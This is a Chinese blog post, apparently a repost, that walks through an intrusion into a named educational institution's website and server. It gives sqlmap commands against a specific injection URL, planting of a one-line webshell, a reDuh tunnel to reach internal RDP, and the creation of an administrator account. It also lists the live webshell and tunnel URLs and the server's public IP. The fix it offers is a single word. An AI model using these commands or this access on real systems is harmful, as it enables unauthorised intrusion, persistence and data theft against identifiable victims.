如何绕过服务器禁止的网站,看我如何SQL注入沦陷一个网站绕过端口限制RDP隧道进服务器…

网址:http://shy.hpe.sh.cn

一个sql注入导致的服务器沦陷。

一个事业教育单位,今天就上服务器看看.(声明:未有任何破坏性操作)

没事溜达到这个网址:(注入点)

http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/GetArticleList.aspx?parentid=169

首先是暴库(16个数据库吧):

sqlmap -u "http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/GetArticleList.aspx?parentid=169" –dbs

imgpxy.php?url=gnp.321632032021114102%2F1141_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

DBA权限:

imgpxy.php?url=gnp.732952032021114102%2F1141_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

管理员:

imgpxy.php?url=gnp.984762032021114102%2F1141_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

脱裤暴表就没弄了,要这些数据也没啥用。选择了利用这个渗透进服务器。

下面说重点了。os-shell

sqlmap -u "http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/GetArticleList.aspx?parentid=169" –os-shell

imgpxy.php?url=gnp.110572032021114102%2F1141_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

比较奇怪sqlmap里执行os-shell不顺手,有点问题,现在就是写个马进去就行了。

果断换了种方式写了个一句话:

imgpxy.php?url=gnp.632482032021114102%2F1141_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

之前报错信息已经暴漏了网站的物理地址,马的物理位置:

d:\mainweb\ParentSchool\CN\jxhd\import.aspx

直接上服务器:

imgpxy.php?url=gnp.890292032021114102%2F1141_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

至此,已经拥有了这台服务器的shell了。

上了个文件getinfo.aspx,这个getinfo.aspx是我等下要用到的。

到这里就在想能否RDP进服务器看看。菜刀里看的着实不舒服。

得到的公网IP信息:

Nmap scan report for 210.22.116.91

Host is up (0.011s latency).

Not shown: 999 filtered ports

PORT STATE SERVICE VERSION

80/tcp open http Microsoft IIS httpd 7.0

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

就开了个80端口。

在菜刀里ipconfig下看到的是:

以太网适配器 本地连接:

连接特定的 DNS 后缀 . . . . . . . :

本地链接 IPv6 地址. . . . . . . . : fe80::852a:c63b:2d0a:b032%10

IPv4 地址 . . . . . . . . . . . . : 10.11.124.5

子网掩码 . . . . . . . . . . . . : 255.255.255.0

默认网关. . . . . . . . . . . . . : 10.11.124.1

原来是这样的:

公网ip地址:210.22.116.91 这个只开了80端口

内网ip地址:10.11.124.5

要么是防火墙,要么做了端口映射,直接访问内网ip地址:10.11.124.5肯定是不行的了。怎么办?

上面的上传的那个getinfo.aspx文件的作用来了。

这里reDuh隧道穿透了:

java -jar reDuhClient.jar http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/getinfo.aspx

给大家弄个截图,大致会出现下面界面:

imgpxy.php?url=gnp.223203032021114102%2F1141_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

打开本地1010端口,使用telnet或者nc连接本地的1010端口:

imgpxy.php?url=gnp.482603032021114102%2F1141_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

创建隧道:[createTunnel]1234:127.0.0.1:3389

nc本地1010端口,将本地1234端口与远程的服务器端3389端口绑定

imgpxy.php?url=gnp.670113032021114102%2F1141_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

ok,基本工作均已完成。下面在用菜刀添加个用户:

imgpxy.php?url=gnp.713413032021114102%2F1141_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

密码就不显示了。

提升权限至administrators组

好了,这就全部完成了:

mstsc打开本地127.0.0.1:1234端口,输入刚添加的用户名密码。直接RDP进内网吧:

imgpxy.php?url=gnp.575423032021114102%2F1141_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

这样就想操作你自己的电脑一样了,想干什么就干什么。漏洞证明:

如上。

一句话:

http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/import.aspx

RDP隧道:

http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/getinfo.aspx修复方案:

过滤

原文链接:https://blog.csdn.net/weixin_39782709/article/details/119307574

© 版权声明
THE END
喜欢就支持一下吧
点赞10 分享